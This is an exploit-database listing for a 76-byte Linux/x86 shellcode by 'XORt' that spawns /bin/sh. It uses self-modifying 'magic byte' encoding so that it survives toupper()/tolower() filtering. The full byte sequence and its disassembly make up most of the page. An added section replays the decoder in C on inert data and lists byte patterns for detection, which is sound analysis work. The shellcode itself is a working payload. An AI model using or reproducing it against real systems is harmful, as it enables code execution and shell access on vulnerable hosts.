Linux/x86 – Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)

Vulnerability ID: 1054837 | Vulnerability type:
Published: 2004-12-22 | Updated: 2004-12-22
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux_x86 | CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13421
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
/*-------------------------------------------------------*/
/*     Magic Byte Self Modifying Code for surviving      */
/*               toupper() & tolower()                   */
/*        76bytes execve() _exit() code by XORt          */
/*-------------------------------------------------------*/
"\xeb\x34"               /* jmp $0x34          [revert]  */
"\x5e"                   /* pop %esi                     */
/*--set-up-variables-------------------------------------*/
"\x89\xf7"               /* mov %esi, %edi               */
"\x83\xef\x22"           /* sub $0x22, %edi              */
"\x31\xc9"               /* xor %ecx, %ecx               */
"\xb1\x8c"               /* mov $0x8c, %cl               */
"\xd1\xc9"               /* ror $0x1, %ecx    (70loops)  */
/*-scan-for-magic-byte-----------------------------------*/
"\xb0\x7b"               /* mov $0x7b, %al               */
"\xf2\xae"               /* repne scasb                  */
"\xff\xcf"               /* dec %edi                     */
"\xac"                   /* lodsb            (al=DS:SI)  */
"\x28\x07"               /* subb %al, (%edi)             */
/*--loop-back-to-scanner---------------------------------*/
"\xe2\xf5"               /* loop -$0xe      [load-byte]  */
/*-------------------------------------[length:25bytes]--*/
//                                                       //
/*--modified-shellcode-----------------------------------*/
"\x89\x7b\x08"           /* movl %esi, 0x8(%esi)        @*/
"\x91"                   /* xchg %eax, %ecx              */
"\x88\x7b\x07"           /* movb %al, 0x7(%esi)         @*/
"\x89\x7b\x0c"           /* movl %eax, 0xc(%esi)        @*/
"\xb0\x0b"               /* movb $0xb, %al               */
"\x89\xf3"               /* movl %esi, %ebx              */
"\x8d\x7b\x08"           /* leal 0x8(%esi), %ecx        @*/
"\x8d\x7b\x0c"           /* leal 0xc(%esi), %edx        @*/
"\xcd\x80"               /* int $0x80                    */
"\x31\xdb"               /* xorl %ebx, %ebx              */
"\x89\xd8"               /* movl %ebx, %eax              */
"\x40"                   /* inc %eax                     */
"\xcd\x80"               /* int $0x80                    */
/*--revert-----------------------------------------------*/
"\xe8\xc7\xff\xff\xff"   /* call -$0x39                  */
/*--offset-table-----------------------------------------*/
"\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13"             /**/
/*--string-to-run----------------------------------------*/
"/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh"            */
/*--------------------------------------[length:51bytes]-*/


// milw0rm.com [2004-12-22]
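
For analysts triaging this encoding, an added example (not part of the original milw0rm listing): a static replay of the decoder stub that treats the 76 bytes purely as data, confirms the listing contains no ASCII letters for toupper()/tolower() to alter, and shows what the offset table restores. The function names and the offsets 59 and 25 are this example's own, derived from the listing's `call`/`pop` pair and its `sub $0x22` instruction.

```c
#include <stdio.h>
#include <string.h>

/* Read off the stub: %esi = offset table (59), %edi = %esi - 0x22, %ecx = 0x8c ror 1. */
enum { MAGIC = 0x7b, TABLE_OFF = 59, SCAN_OFF = TABLE_OFF - 0x22, BUDGET = 0x8c >> 1 };
/* The 76 bytes of the listing, held as inert data; nothing here is executed. */
static const unsigned char listing[] =
    "\xeb\x34\x5e\x89\xf7\x83\xef\x22\x31\xc9\xb1\x8c\xd1\xc9\xb0\x7b\xf2\xae\xff\xcf"
    "\xac\x28\x07\xe2\xf5\x89\x7b\x08\x91\x88\x7b\x07\x89\x7b\x0c\xb0\x0b\x89\xf3\x8d"
    "\x7b\x08\x8d\x7b\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc7\xff\xff\xff"
    "\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13" "/\x7b\x7b\x7b/\x7b\x7b";
#define LISTING_LEN (sizeof listing - 1)

/* Count ASCII letters, the only bytes toupper()/tolower() would rewrite. */
static size_t count_letters(const unsigned char *p, size_t n) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += ((p[i] | 0x20) >= 'a' && (p[i] | 0x20) <= 'z');
    return hits;
}

/* Replay the decoder on a copy; one counter pays for each scasb compare and each loop. */
static int replay_decoder(unsigned char *buf, size_t n, int *left) {
    size_t edi = SCAN_OFF, esi = TABLE_OFF;
    int ecx = BUDGET, patched = 0;
    while (ecx > 0) {
        int hit = 0;
        for (; ecx > 0 && edi < n && !hit; ecx--)          /* repne scasb */
            hit = (buf[edi++] == MAGIC);
        if (!hit || esi >= n) break;                        /* no match left */
        edi--;                                              /* dec %edi */
        buf[edi] = (unsigned char)(buf[edi] - buf[esi++]);  /* lodsb; subb */
        patched++;
        ecx--;                                              /* loop */
    }
    *left = ecx;                                            /* unused part of the counter */
    return patched;
}

int main(void) {
    unsigned char copy[LISTING_LEN];
    int left, patched;
    memcpy(copy, listing, LISTING_LEN);
    size_t before = count_letters(copy, LISTING_LEN);
    patched = replay_decoder(copy, LISTING_LEN, &left);
    printf("letters before %zu, after %zu; patched %d, counter left %d\n",
           before, count_letters(copy, LISTING_LEN), patched, left);
    return 0;
}
```

The counter reaching exactly zero after the tenth patch is why the listing's `ror` comment says 70: 60 byte comparisons plus 10 `loop` iterations. For detection, the useful invariants are the letter-free byte string and the `\xb0\x7b\xf2\xae` scan sequence, since the decoded instructions never appear on the wire.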
